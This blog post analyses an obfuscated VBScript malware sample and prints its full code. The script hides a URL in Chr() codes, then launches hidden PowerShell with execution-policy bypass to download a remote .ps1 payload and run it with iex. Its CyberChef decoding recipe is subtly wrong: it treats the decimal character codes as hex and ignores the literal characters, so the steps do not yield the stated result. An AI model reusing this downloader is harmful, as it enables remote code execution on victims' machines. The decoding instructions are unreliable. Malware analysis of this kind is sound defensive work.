Analysis Malicious VBS Script

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
Analysis Malicious VBS Script

By Diyar Saadi | WIN32 | July 14, 2025

Like PowerShell scripts, VBA scripts are sometimes used by attackers to download the second or final stage of malware, because such scripts can interact with the operating system and the shell. Malware analysts know VBA scripts mostly from Office documents and malicious macros. In this post we analyze a malicious VBS script by explaining its code and decoding the strings that the malware developers obfuscated to bypass the programs used to scan devices for malware.

SHA256 : 20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147

Sample : https://bazaar.abuse.ch/sample/20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147

Malicious VBScript Code :

```vbscript
Dim wsh, http, url, method, async

url = Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)

Set wsh = CreateObject("WScript.Shell")
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")

method = "GET"
async = False

http.Open method, url, async
http.Send

wsh.Run "powershell -nop -exec bypass -c """"$url='" & url & "';$req=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.Open('GET',$url,$false);$req.Send();iex $req.ResponseText""""", 0, async

' Cleanup
Set wsh = Nothing
Set http = Nothing
```

Code Explanation :

- The malware developer declares five variables: wsh, http, url, method and async.
- The malware developer obfuscates the URL of the second-stage payload by building it from Chr() character codes mixed with single-character string literals, so the plain URL never appears in the file.
- The malware developer creates an object to interact with the shell: Set wsh = CreateObject("WScript.Shell")
- The malware developer creates an object to send Windows HTTP requests: Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
- The malware developer uses the GET method to retrieve the file from the host on which the second stage is hosted.
- The malware developer then runs PowerShell with -nop -exec bypass to bypass the execution policy, downloads the same URL again through WinHttpRequest and executes the response text with iex. The 0 passed to wsh.Run hides the PowerShell window.

Decoding the Encoded Char :

Charcode :

```vbscript
Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)
```

1. Open CyberChef (gchq.github.io/CyberChef) and paste the charcode into the Input pane on the right side.
2. In the Operations pane on the left, search for Find/Replace and set Find: Chr\((\d+)\) (regex) and Replace: \x$1
3. Add the From Hex operation.

Result : https[://]yettigretarding[.]com/[.vbs]/1759/1759[.ps1]